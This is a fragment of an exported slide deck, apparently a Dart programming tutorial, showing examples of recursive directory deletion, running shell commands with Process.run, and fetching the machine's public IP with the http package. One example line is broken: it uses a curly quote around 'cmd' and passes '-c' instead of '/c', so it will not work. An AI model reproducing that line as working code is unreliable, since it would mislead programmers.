            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  if (await dir.exists()) {</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>	try {</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  	await dir.delete(recursive: true);</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  	print('Directory and all contents deleted.');</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>	} catch (e) {</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  	print('Error occurred: $e');</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>	}</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  } else {</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>	print('Directory does not exist.');</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  }</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>void main() {</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  deleteDirectory('path/to/directory');</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="Google Shape;190;g2a0d279bb21_0_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191" name="Google Shape;191;g2a0d279bb21_0_54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5242200" y="3833525"/>
            <a:ext cx="3901800" cy="111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800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Recursive d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>elete of directory</a:t>
            </a:r>
            <a:endParaRPr sz="28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a0d279bb21_0_1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dart:io library</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="Google Shape;197;g2a0d279bb21_0_1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GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Process class:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Allows you to run external processes and interact with them.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Process.run()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Runs an external command and returns the result.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="Google Shape;198;g2a0d279bb21_0_1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1ec521e0706_0_17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5371625" y="3424100"/>
            <a:ext cx="3571800" cy="150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Example: Execute shell commands</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>using Process.run()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="Google Shape;204;g1ec521e0706_0_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05" name="Google Shape;205;g1ec521e0706_0_17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="215450" y="120200"/>
            <a:ext cx="5233800" cy="48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50">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>import 'dart:io';</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>void main() async {</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  // Execute the 'dir' command on Windows</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  final result = await Process.run(‘cmd’, ['-c',  'dir']);</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  // Check if the command executed successfully</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  if (result.exitCode == 0) {</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    // Print the stdout of the command</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    print('stdout:');</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    print(result.stdout);</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  } else {</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    // Print the stderr if the command failed</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    print('stderr:');</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    print(result.stderr);</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350">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a0d279bb21_0_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dart http library</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Google Shape;211;g2a0d279bb21_0_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Simple HTTP interface using methods such as http.get() and http.post()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>We can also use an http Client for multiple requests:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>final client = http.Client();</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Then do more requests with client.get() and client.post()</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
        <p:nvSpPr>
          <p:cNvPr id="212" name="Google Shape;212;g2a0d279bb21_0_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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="3351400"/>
            <a:ext cx="4159800" cy="163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Example: Get our public IP address from the website ‘ifconfig.me/ip’</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="Google Shape;218;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="140350" y="679900"/>
            <a:ext cx="5464200" cy="41850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rPr lang="en-GB" sz="1350"/>
              <a:t>import 'package:http/http.dart' as http;</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>void fetchData() async {</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  var url = Uri.parse('http://ifconfig.me/ip');</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  var response = await http.get(url);</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
